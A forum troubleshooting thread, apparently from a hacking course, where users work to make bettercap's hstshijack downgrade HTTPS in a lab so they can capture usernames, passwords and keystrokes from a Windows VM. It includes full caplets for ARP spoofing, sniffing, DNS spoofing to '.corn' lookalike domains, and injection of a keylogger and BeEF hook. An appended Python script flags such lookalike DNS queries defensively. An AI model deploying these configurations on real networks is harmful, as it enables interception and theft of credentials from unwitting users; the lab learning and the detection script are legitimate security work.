Bettercap hstshijack not working

After I did what you suggested:

Normal http websites are sniffed out fine now, like before. I’m able to see the username and passwords.

But, when I go to https websites like stackoverflow.com, I get 206 Partial Content -> MSEDGEWIN10.local

The packages are http packets, which is an improvement.

This is from the Win 10 VM on the same NAT network.


Yes, I see, but you didn’t tell me if you already tried the above suggestions?

I installed 2.23 of bettercap and got the above results

See, bettercap custom hstshijack will fail to downgrade the connection due to one or more of the following reasons:

  1. You missed a tiny step, so please revise the lectures and make sure you do everything as shown.

  2. You manually typed https:// in the URL bar.

  3. You manually configured the DNS server in the target machine to 8.8.8.8 or 1.1.1.1 or anything else.

  4. You have a browser extension that is stopping this such as https-everywhere or no-javascript.

  5. You did not fully remove browsing data.

  6. Try also to execute the commands manually inside bettercap instead of using the spoof.cap, and try it against different browsers and see if you can downgrade the connection.

I tried without manually typing https://, I erased all browsing data, I tried Chrome, Edge and Firefox.

I did not ever manually tamper with the DNS settings. I only recently installed the Win 10 VM anyway.

I have no extensions installed in any of the browsers.

I have already both manually done the commands and done it using the spoof.cap file.

I am currently reviewing the lecture again, but up till now, I did not find any mistake. I shall keep trying.


Okay, please try again, just reboot both Kali and Windows for the purpose of testing and let us know if you face the same issue. Try it also within the nat network as shown in the course. If it works, then try to proceed with testing against the real machine. Make sure also that you don’t connect Windows VM to a bridged adapter.

I have rebooted it multiple times, but the same result always occurs. The above result is in the nat network. And yes, the windows VM is not connected to the wireless adapter.

If you are unable to debug this issue, could you send some alternatives and links to their documentation and/or tutorials? It would be really helpful.

Thanks

Here are the docs:
https://www.bettercap.org/legacy/

Actually, I meant the documentation of the alternatives


I've encountered the same issue.
Spoofing worked but the https downgrade failed.

At the moment I got everything to work, except for login and password capture in https-websites.

I set my spoof.cap to:
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.target 192.168.0.217
arp.spoof on
set net.sniff.local true
set net.sniff.output stored_output.cap
net.sniff on

I ran the spoof:
sudo bettercap -iface eth0 -caplet /root/spoof.cap

Checked if it worked, using command help.
Then I already checked the connection by generating traffic on the Windows VM.
And after that traffic was captured in kali.
Then I entered the command:
hstshijack/hstshijack

And then suddenly it did work…

At first the hsts-downgrade failed, because f.i. Facebook.corm gave an error message, so I downgraded to Bettercap 2.23 as shown by AJS.
Then I restarted both Linux VM and Windows VM (target).
And after that also hsts-downgraded website loaded.
And I can capture login and password input.

Only problem is I can’t get the key capture to work for downgraded https websites.
I'm gonna try putting some websites in the hstshijack file.

I found an error in the hstshijack.cap as well for linkedin, I think.

hstshijack.targets: www.linkedin.com
hstshijack.replacements: linkedin.com

that should be different I thought.

So I changed it to *.linkedin.com for targets
and *.linkedin.corn for replacements and dns spoof domains.

The downgrade only works when used in http://google.com
https://google.com doesn’t do the trick.

And on bing almost no websites are downgraded.
Luckily google.com does get downgraded on bing.

I don’t get key stroke registration on Linkedin though
But I do so on Facebook and most of the times on Twitter.corn.

The system works but is not entirely stable…

Update: I do get https downgrade to work.

But the examples Zaid uses in the course are currently HSTS instead of “regular” https.
Linkedin, Twitter are hsts at the moment.

I have the same problem and I still have not fixed it. I changed my spoof.cap file to yours by adding “set net.sniff.output stored_output.cap”, which was the only difference between our spoof.cap files, but it still did not work. Could you please explain how you fixed it so the login feature works when the hsts files have been downgraded, and could you share your hstshijack file that made it work?
Thanks, Somkene

Hi Somkene,

I have set up hstshijack.cap as such:

"
set hstshijack.log /usr/share/bettercap/caplets/hstshijack/ssl.log
set hstshijack.ignore *
set hstshijack.targets twitter.com,.twitter.com,facebook.com,.facebook.com,apple.com,.apple.com,ebay.com,.ebay.com,.linkedin.com
set hstshijack.replacements twitter.corn,.twitter.corn,facebook.corn,.facebook.corn,apple.corn,.apple.corn,ebay.corn,.ebay.corn,.linkedin.corn
set hstshijack.obfuscate false
set hstshijack.encode false
set hstshijack.payloads *:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js, *:/usr/share/bettercap/caplets/hstshijack/inject-beef.js

set http.proxy.script /usr/share/bettercap/caplets/hstshijack/hstshijack.js
set dns.spoof.domains twitter.corn,.twitter.corn,facebook.corn,.facebook.corn,apple.corn,.apple.corn,ebay.corn,.ebay.corn,*.linkedin.corn

http.proxy on
dns.spoof on

"

Which version of Bettercap do you use?
Did you try downgrading to Bettercap 2.23 as shown by AJS in the post above?
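
Seen from the defending side, the replacement hostnames in the caplet above (a ".corn" name standing in for each ".com" target) are a detectable signal in resolver logs. The following is an added example, not code from any post in this thread: it folds visually confusable character sequences and flags queries that only then match a protected domain. The watch list, the confusables table (which covers more than the "rn"/"m" swap used in the thread) and the dnsmasq-style log format are assumptions.

```python
import re

# Domains to protect; these are the targets named in the caplet above.
WATCHED = {"twitter.com", "facebook.com", "apple.com", "ebay.com", "linkedin.com"}
# Sequences that render like another letter (assumed, non-exhaustive list).
CONFUSABLES = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"))
QUERY_RE = re.compile(r"query\[(?:A|AAAA)\]\s+(\S+)\s+from\s+(\S+)")

def in_domain(host, domain):
    return host == domain or host.endswith("." + domain)

def lookalike_of(host):
    """Return the watched domain that `host` visually imitates, else None."""
    clean = host.lower().rstrip(".")
    if any(in_domain(clean, d) for d in WATCHED):
        return None  # genuine name, e.g. cdn1.twitter.com
    folded = clean
    for seq, repl in CONFUSABLES:
        folded = folded.replace(seq, repl)
    for domain in sorted(WATCHED):
        if in_domain(folded, domain):
            return domain
    return None

def scan(lines):
    """Return (client, queried_name, imitated_domain) for each suspicious query."""
    hits = []
    for line in lines:
        match = QUERY_RE.search(line)
        if not match:
            continue
        host, client = match.groups()
        target = lookalike_of(host)
        if target:
            hits.append((client, host.lower().rstrip("."), target))
    return hits

# Constructed dnsmasq-style resolver log lines (not captured traffic).
SAMPLE_LOG = [
    "Mar  1 10:00:01 dnsmasq[512]: query[A] www.twitter.com from 10.0.2.15",
    "Mar  1 10:00:04 dnsmasq[512]: query[A] twitter.corn from 10.0.2.15",
    "Mar  1 10:00:09 dnsmasq[512]: query[AAAA] www.linkedin.corn from 10.0.2.15",
    "Mar  1 10:00:12 dnsmasq[512]: query[A] cdn1.twitter.com from 10.0.2.15",
    "Mar  1 10:00:15 dnsmasq[512]: forwarded www.twitter.com to 10.0.2.3",
]

if __name__ == "__main__":
    for client, name, target in scan(SAMPLE_LOG):
        print(f"{client} queried {name}, which imitates {target}")
```

A hit from a single client shortly after that client's gateway MAC address changes is worth correlating with ARP monitoring on the same segment.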

Yes, I downgraded to bettercap 2.23.

Hey can you please attach a link or file of older version ( 2.23 ) of Bettercap here. Coz I’m not able to find it anywhere. Plz reply if you see it.

Bro, I have the same problem. Did you solve it?

Hi @Security_Buster, did you try the old version of bettercap?